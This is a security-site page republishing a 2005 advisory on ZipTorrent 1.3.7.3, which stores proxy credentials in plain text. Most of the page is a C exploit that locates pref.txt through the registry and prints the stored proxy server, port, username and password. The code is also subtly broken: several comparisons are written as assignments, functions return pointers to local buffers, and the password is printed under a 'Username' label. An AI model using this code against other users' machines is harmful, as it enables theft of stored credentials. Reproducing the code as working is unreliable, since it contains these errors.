首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZipTorrent Local Information Disclosure
来源:www.spyinstructors.com 作者:Kozan 发布时间:2005-09-08  

ZipTorrent Local Information Disclosure


Summary
ZipTorrent allows you to search & download torrents quickly and easily on popular torrent search engines without leaving the software, and allows you to sort results by size, name, seeders & leechers, categories, and more!

Lack of proper protection of the passwords used by ZipTorrent allows local attackers to retrieve them.

Credit:
The information has been provided by Kozan.
The original article can be found at: http://www.spyinstructors.com/show.php?name=Advisories&pa=showpage&pid=65

Details
Vulnerable Systems:
* ZipTorrent 1.3.7.3

ZipTorrent stores proxy server information and password in X:\[Program_Files_Path]\[ZipTorrent_Path]\pref.txt in plain text. A local user that can access this file would be in turn able to read the passwords stored in it.

Exploit:
/*================================

ZipTorrent 1.3.7.3 Local Proxy Password Disclosure Exploit by Kozan

Discovered & Coded by Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Application:
--------------------
ZipTorrent 1.3.7.3 (and probably prior versions)
Vendor: www.ziptorrent.com

Introduction:
--------------------
ZipTorrent is the fastest BitTorrent client for Windows with the
most features, such as Search om Major search engines an RSS reader,
IRC Chat rooms, Automatic Torrent Download Rules, Automatic Update,
Bandwidth Monitor, NAT Checking, and UPnP Support. An install wizard
that helps you through the installation process.

Bug:
--------------------
ZipTorrent stores proxy server information and password in
X:\\[Program_Files_Path]\[ZipTorrent_Path]\pref.txt
in plain text. A local user can read passwords and others.

Vendor Confirmed:
--------------------
No

Fix:
--------------------
There is no solution at the time of this entry.

-================================*/

#include <stdio.h>
#include <windows.h>

int GetOffset(char *FilePath, char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
if( (di=fopen(FilePath,"rb")) = NULL )
{
fclose(di);
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 ) fseek(di,Sayac+1,SEEK_SET);
break;
}

if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}

fclose(di);
return -1;
}


char *ReadString(char *FilePath, char *Str)
{
FILE *di;
char cr;
int i=0;
char Feature[500];

int Offset = GetOffset(FilePath,Str);

if( Offset = -1 ) return NULL;
if( (di=fopen(FilePath,"rb")) = NULL ) return NULL;

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr = 0x0D) break;
Feature[i] = cr;
i++;
}

Feature[i] = '\0';
fclose(di);
return Feature;
}

char *GetZipTorrentPath()
{
HKEY hKey;
char szZipTorrentPath[MAX_PATH];
DWORD dwBufLen = MAX_PATH;
LONG lRet;

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\ZipTorrent",
0,
KEY_QUERY_VALUE,
&hKey
) = ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey,
"Install_Dir",
NULL,
NULL,
(LPBYTE) szZipTorrentPath,
&dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > MAX_PATH) )
{
RegCloseKey(hKey);
return NULL;
}
RegCloseKey(hKey);
return szZipTorrentPath;
}
return NULL;
}


int main()
{
char szPwdFile[MAX_PATH];
char szServer[255], szPort[255], szUsername[255], szPassword[255];
bool bInstalled;
if( GetZipTorrentPath() = NULL ) bInstalled = false;
else
{
bInstalled = true;
strcpy(szPwdFile, GetZipTorrentPath());
strcat(szPwdFile, "\\pref.txt");
strcpy(szServer, ReadString(szPwdFile, "proxy_ip | "));
strcpy(szPort, ReadString(szPwdFile, "proxy_port | "));
strcpy(szUsername, ReadString(szPwdFile, "proxy_username | "));
strcpy(szPassword, ReadString(szPwdFile, "proxy_password | "));
}

fprintf(stdout, "ZipTorrent 1.3.7.3 Local Proxy Password Disclosure
Exploit by Kozan\n");
fprintf(stdout, "Credits to ATmaCA\n");
fprintf(stdout, "Web: www.spyinstructors.com \n");
fprintf(stdout, "Mail: kozan@spyinstructors.com \n\n");

if( !bInstalled )
{
fprintf(stderr, "ZipTorrent is not installed on your pc!\n");
return -1;
}

fprintf(stdout, "Proxy Server\t: \t%s\n", szServer);
fprintf(stdout, "Proxy Port\t: \t%s\n", szPort);
fprintf(stdout, "Proxy Username\t: \t%s\n", szUsername);
fprintf(stdout, "Proxy Username\t: \t%s\n", szPassword);

return 0;
}

/* EoF */



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Man2web CGI Command Execution
·USB Lock Auto-Protect Locally
·CUPS Dot-Slash DoS
·GNU Mailutils imap4d search Co
·Microsoft Windows keybd_event
·Raxnet Cacti graph_image.php R
·MS05-018 windows CSRSS.EXE Sta
·Snort <= 2.4.0 SACK TCP Opt
·P2P Pro Command DoS
·COOL! Remote Control DoS
·FREE SMTP Open Relay Vulnerabi
·Windows XP Firewall Bypassing
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved